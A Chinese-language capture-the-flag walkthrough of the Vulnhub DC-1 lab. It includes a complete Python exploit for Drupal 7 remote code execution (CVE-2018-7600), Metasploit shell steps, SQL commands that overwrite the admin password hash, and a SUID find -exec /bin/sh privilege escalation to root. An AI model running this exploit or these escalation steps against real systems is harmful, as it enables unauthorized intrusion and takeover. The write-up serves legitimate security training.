Vulnhub靶场——DC1
一、环境准备
Kali:192.168.56.101
靶机:192.168.56.103
二、开始复现
1.信息收集
首先在kali中使用arp-scan进行一下主机探活
arp-scan -l
发现192.168.56.103,使用nmap进行扫描查看开启的端口和服务
nmap -sV -A 192.168.56.103
我们先从80端口开始入手
可以看到使用了drupal7 cms管理系统,在Drupal 7 <= 7.57是有一个命令执行漏洞的,我们使用poc来验证一下。
#!/usr/bin/env python3
import requests
import argparse
from bs4 import BeautifulSoup
def get_args():
parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7600.py",
formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
epilog= '''
This script will exploit the (CVE-2018-7600) vulnerability in Drupal 7 <= 7.57
by poisoning the recover password form (user/password) and triggering it with
the upload file via ajax (/file/ajax).
''')
parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
parser.add_argument("-p", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
args = parser.parse_args()
return args
def pwn_target(target, function, command, proxy):
requests.packages.urllib3.disable_warnings()
proxies = {'http': proxy, 'https': proxy}
print('[*] Poisoning a form and including it in cache.')
get_params = {'q':'user/password', 'name[#post_render][]':function, 'name[#type]':'markup', 'name[#markup]': command}
post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'}
r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
soup = BeautifulSoup(r.text, "html.parser")
try:
form = soup.find('form', {'id': 'user-pass'})
form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
if form_build_id:
print('[*] Poisoned form ID: ' + form_build_id)
print('[*] Triggering exploit to execute: ' + command)
get_params = {'q':'file/ajax/name/#value/' + form_build_id}
post_params = {'form_build_id':form_build_id}
r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
parsed_result = r.text.split('[{"command":"settings"')[0]
print(parsed_result)
except:
print("ERROR: Something went wrong.")
raise
def main():
print ()
print ('=============================================================================')
print ('| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |')
print ('| by pimps |')
print ('=============================================================================\n')
args = get_args() # get the cl args
pwn_target(args.target.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())
if __name__ == '__main__':
main()
我们可以看到是存在漏洞的
2.启动msf拿shell
启动msf搜索下drupal可用的exp,既然我们已经使用POC验证过来,那么我们直接使用第四个。
设置好相应的参数,进行攻击。
我们使用python作为中介,将他升级为交互式会话。
python -c 'import pty; pty.spawn("/bin/bash")'
在当前目录下找到了flag1并且发现了线索。
让我们去找到drupal的配置文件,百度一下就可以,在sites/default下面
得到flag2,同时说暴力破解不是唯一获得访问权限的方法,然后提示数据库,并且给了数据库用户名与密码。
3.连接数据库拿flag3
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
mysql> show databases; mysql> use drupaldb; mysql> show tables; mysql> select * from users; mysql> select name,pass from users;
密码经过drupal加密,思路就是将我们自己的密码进行加密,在数据库中替换admin用户的密码。加密文件在scripts下。
或者使用CVE2014-3704添加管理账号。
但是进行加密的时候,出错了,原因是/var/www/scripts/includes/password.inc找不到。
我们使用命令cp -r ../includes ./,将整个includes目录复制到scripts目录。
成功对密码进行加密:
password: 123456 hash: $S$DmOoy9/0/IU5LO0Lo2vnPbF/9Tby9Ss7k49/DjYmBndDnx9yrQ/x
再次进入数据库修改admin用户的密码
update users set pass='$S$DmOoy9/0/IU5LO0Lo2vnPbF/9Tby9Ss7k49/DjYmBndDnx9yrQ/x' where name='admin';
我们可以看到密码已经修改为我们的密码
我们直接登陆拿到flag3
4.提权
拿到flag3后,提示我们需要提权
就是用find 和 -exec命令呗 ,这不就是suid提权。
并且还说找一下password,结果发现了flag4
我们继续进行提权,发现find,如果find本身具有suid的权限,因此通过find执行的命令就是root权限。
find / -user root -perm /4000 2>/dev/null
我们执行
find ./ aaa -exec '/bin/sh' \;
#find是suid权限,-exec 参数后面跟的command命令是调用shell程序,那么此时就会使用root权限开启了一个shell,即提权至root权限
进入root目录下查看,获得最终的flag。
三、知识总结
整体步骤:
利用CMS已知漏洞进入系统,在网站目录下得到flag1
根据flag1提示的配置文件,找到settings.php,得到flag2
利用配置文件中的数据库账号密码进入mysql数据库,发现一张用户表users
修改数据库中users表里的用户密码,利用新账户密码进入CMS,得到flag3
在passwd下发现flag4用户,在flag4用户目录下得到flag4
利用find的SUID权限以及 -exec 参数提权至root,得到flag5
知识点:
提权时,可以利用SUID权限的命令,如find来进行root权限的操作。
当find拥有SUID权限时,find执行的命令就会具有root权限,而 -exec 参数后边的值是可以执行的命令。
当该参数值设定为调用 /bin/bash 或者 /bin/sh 时,就会使用root权限开启一个shell,提权成功。
借鉴:https://blog.csdn.net/qq_43968080/article/details/105523213